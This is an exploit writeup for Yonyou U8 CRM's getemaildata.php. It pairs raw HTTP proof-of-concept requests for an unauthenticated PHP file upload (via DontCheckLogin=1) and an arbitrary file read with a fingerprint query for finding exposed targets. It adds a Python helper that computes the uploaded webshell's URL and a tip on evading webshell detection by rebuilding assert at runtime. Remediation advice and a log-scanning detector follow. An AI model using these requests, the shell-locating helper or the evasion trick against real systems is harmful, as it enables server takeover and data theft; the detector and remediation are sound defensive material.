0x01 Product Introduction
Yonyou U8 CRM is enterprise-level customer relationship management software designed to help enterprises manage customer relationships efficiently, improve sales performance and deliver high-quality customer service.
0x02 Vulnerability Overview
The getemaildata.php file of the U8 CRM customer relationship management system contains an arbitrary file upload and an arbitrary file read vulnerability. By uploading a PHP file, an attacker can execute code on the server and take control of it.
0x03 Reproduction Environment
Hunter (鹰图) fingerprint: web.body="U8CRM"
0x04 Vulnerability Reproduction
File Upload PoC
POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykS5RKgl8t3nwInMQ

------WebKitFormBoundarykS5RKgl8t3nwInMQ
Content-Disposition: form-data; name="file"; filename="a.php "
Content-Type: text/plain

<?php phpinfo();?>
------WebKitFormBoundarykS5RKgl8t3nwInMQ--
PS: The uploaded file is stored as upd***.tmp.php under /tmpfile/, where *** is derived from the file name the upload response returns: strip its extension (e.g. .mht), hex-encode the remaining name, and subtract one from the resulting hexadecimal number. Example: a returned 1022.mht gives 1022 -> 31303232 (hex); 31303232 - 1 = 31303231 (which decodes back to 1021), so the file is reached at /tmpfile/upd31303231.tmp.php.
Verification URL:
http://your-ip/tmpfile/upd<hex-minus-one>.tmp.php
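The name derivation described in the PS above, written out as an added helper (example code, not part of the original writeup or the product): it strips the extension from the returned file name, hex-encodes the rest, subtracts one from that hexadecimal number, and builds the verification URL under /tmpfile/. The writeup's only example (1022 -> 31303231) involves no borrow, so treating the subtraction as hexadecimal arithmetic is this helper's assumption.

```python
from urllib.parse import urljoin


def tmp_shell_name(returned_name: str) -> str:
    """Return the 'upd<hex>.tmp.php' name described in the writeup.

    Steps as the writeup states them: drop the extension the response appends
    (e.g. '.mht'), hex-encode the remaining ASCII name, read that hex string as
    a number, subtract one, and wrap it in 'upd' / '.tmp.php'.
    Writeup example: '1022.mht' -> '1022' -> 31303232 -> 31303231.
    """
    stem = returned_name.rsplit(".", 1)[0]        # '1022.mht' -> '1022'
    hex_name = stem.encode("ascii").hex()         # '1022' -> '31303232'
    width = len(hex_name)                         # keep the digit count stable
    # Assumption: the writeup's example has no borrow, so it cannot show whether
    # "minus one" is hex or decimal arithmetic; this helper takes "hexadecimal
    # number minus one" literally, so a trailing 0x30 becomes 0x2f.
    adjusted = int(hex_name, 16) - 1              # 0x31303232 - 1 = 0x31303231
    return f"upd{adjusted:0{width}x}.tmp.php"


def shell_url(base_url: str, returned_name: str) -> str:
    """Build the verification URL under /tmpfile/ for the given base URL."""
    return urljoin(base_url.rstrip("/") + "/", "tmpfile/" + tmp_shell_name(returned_name))


if __name__ == "__main__":
    # 'your-ip' is the writeup's placeholder host.
    print(shell_url("http://your-ip", "1022.mht"))
```

Feed it the file name exactly as the upload response returns it; the helper removes the extension itself, and the computed path is what to request to confirm the upload landed.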
(Screenshot: upload)
PS: To evade webshell detection, rebuild the assert call at runtime with substr_replace() so the literal string does not appear in the uploaded file. Note that assert() stopped evaluating string arguments in PHP 8.0, so this trick only works on PHP 7 and older.
(Screenshot: trying to connect to the uploaded shell)
File read PoC (the example path assumes a Windows host)
GET /ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini HTTP/1.1
Host: your-ip
Content-Type: application/json
0x05 Remediation
Do not expose the system directly to the Internet, and enforce strong authentication and authorization on the file upload module. The PoCs above reach getemaildata.php without any session, so the login check must be enforced server-side and must not be skippable through a request parameter such as DontCheckLogin=1; the filePath parameter must likewise be restricted to the directory the feature is meant to serve.
Patch ASAP!
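For defenders who cannot patch immediately, here is an added detection example (not part of the original writeup) that scans common-format web access logs for the indicators visible in the two PoCs: getemaildata.php called with a DontCheckLogin parameter, a filePath parameter on that endpoint, and fetches of /tmpfile/upd<hex>.tmp.php. The log lines are constructed for the example and use RFC 5737 documentation addresses; the tag names are the example's own.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx common log prefix: ip ident user [time] "METHOD target PROTO" status size
_LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3}) \S+'
)

# Storage path pattern from the writeup: /tmpfile/upd<hex>.tmp.php
_TMP_SHELL = re.compile(r"^/tmpfile/upd[0-9a-fA-F]+\.tmp\.php$")


def indicators(method: str, target: str) -> list:
    """Tag one request with the indicators taken from the PoCs in the writeup."""
    url = urlsplit(target)
    path = url.path
    # Parameter names compared case-insensitively; values are URL-decoded by parse_qs.
    params = {k.lower(): v for k, v in parse_qs(url.query, keep_blank_values=True).items()}
    tags = []
    if path.lower().endswith("/ajax/getemaildata.php"):
        if "dontchecklogin" in params:
            tags.append("getemaildata-auth-bypass")   # PoC parameter DontCheckLogin=1
        if "filepath" in params:
            tags.append("getemaildata-file-read")     # PoC parameter filePath=...
    if _TMP_SHELL.match(path):
        tags.append("tmpfile-webshell-access")        # fetching the dropped upd*.tmp.php
    return tags


def scan_log(text: str) -> list:
    """Return one dict per log line that carries at least one indicator."""
    hits = []
    for line in text.splitlines():
        m = _LOG_LINE.match(line)
        if not m:
            continue
        tags = indicators(m["method"], m["target"])
        if tags:
            hits.append({"ip": m["ip"], "target": m["target"],
                         "status": int(m["status"]), "tags": tags})
    return hits


# Constructed sample access log (not a real capture). The last line is an ordinary
# authenticated POST to the endpoint and must not be flagged.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0800] "POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1" 200 64
203.0.113.7 - - [01/Jan/2024:10:00:02 +0800] "GET /tmpfile/upd31303231.tmp.php HTTP/1.1" 200 8123
203.0.113.7 - - [01/Jan/2024:10:00:05 +0800] "GET /ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini HTTP/1.1" 200 403
198.51.100.4 - - [01/Jan/2024:10:01:10 +0800] "GET /index.php HTTP/1.1" 200 2048
198.51.100.4 - - [01/Jan/2024:10:01:12 +0800] "POST /ajax/getemaildata.php HTTP/1.1" 200 64
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["target"], ",".join(hit["tags"]))
```

The query-string check only covers the parameter names the PoCs use; if the web server logs the target percent-encoded, run urllib.parse.unquote() over the path before matching, since only the query values are decoded here. A 200 response on the tmpfile path is the strongest signal, because it means the shell was both written and reachable.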